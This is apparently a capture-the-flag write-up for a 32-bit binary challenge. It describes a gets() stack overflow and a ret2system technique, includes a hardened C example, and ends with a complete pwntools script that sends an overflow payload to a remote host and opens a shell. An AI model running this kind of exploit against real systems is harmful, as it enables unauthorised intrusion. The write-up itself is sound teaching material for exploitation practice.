0x01 Finding the vulnerability
checksec
IDA analysis
Enter the hello() function
It calls gets(), which allows a stack overflow
- name is in the .bss section, so it has a fixed address
- an fgets() call can be used to write data into name
- system() is called in the binary, but there is no "/bin/sh" string
0x02 Exploitation idea
Write "/bin/sh" into name first (it has a fixed address), then use the stack overflow to return into system() with the address of name as its argument, which gives a shell.
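As an added example (not the challenge's source or the author's code), here is a minimal stand-in for the hello() pattern above with the unbounded gets() replaced by a bounded fgets(); the buffer size, struct layout and function names are assumptions, not recovered from the binary.

```c
// Added example, not cgpwn2's source: the hello() pattern with gets()
// replaced by a bounded fgets(). MSG_LEN is an assumption chosen to match
// the 0x26 bytes of padding the exploit uses to reach the saved ebp.
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define MSG_LEN 0x26

/*
 * Frame stand-in: in the real function the bytes after `msg` are the saved
 * ebp and the return address. Here `guard` plays that role so a caller can
 * check that nothing past the buffer is written.
 */
struct frame {
    char msg[MSG_LEN];
    unsigned int guard;
};

/*
 * Hardened read: fgets() stores at most sizeof(msg)-1 bytes plus a NUL, so
 * an over-long line can no longer reach `guard`. Returns the number of
 * bytes stored (without the NUL), or -1 on EOF/error.
 */
static int read_message(FILE *in, struct frame *f)
{
    f->guard = 0xdeadbeef;
    if (fgets(f->msg, sizeof f->msg, in) == NULL)
        return -1;
    f->msg[strcspn(f->msg, "\n")] = '\0'; /* drop trailing newline, if any */
    return (int)strlen(f->msg);
}

/*
 * Feed a constructed line of `len` 'A' bytes (no newline) through
 * read_message() using an in-memory stream instead of stdin, and report
 * both the stored length and the guard value after the read.
 */
static int feed_long_input(size_t len, unsigned int *guard_out)
{
    char line[256];
    struct frame f;
    if (len >= sizeof line)
        len = sizeof line - 1;
    memset(line, 'A', len);
    line[len] = '\0';
    FILE *in = fmemopen(line, len, "r");   /* POSIX in-memory FILE* */
    int n = read_message(in, &f);
    fclose(in);
    *guard_out = f.guard;
    return n;
}
```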
0x03 Exploit
#!/usr/bin/env python
from pwn import *
io = remote("111.198.29.45",37884)
# io = process("./cgpwn2")
context.log_level = 'debug'
sys_addr = 0x08048420      # address of the call to system() in the binary
# first input: fgets() writes into the global name buffer in .bss
io.recvuntil(b"your name")
io.sendline(b"/bin/sh")
bin_sh_addr = 0x0804A080   # fixed address of name, now holding "/bin/sh"
# second input: gets() overflows the stack buffer in hello()
io.recvuntil(b"leave some message here:")
# 0x26 bytes of buffer, 4 bytes saved ebp, return address -> system,
# 4 bytes fake return address, then system()'s argument -> name
payload = b"a" * 0x26 + b"aaaa" + p32(sys_addr) + b"aaaa" + p32(bin_sh_addr)
io.sendline(payload)
io.interactive()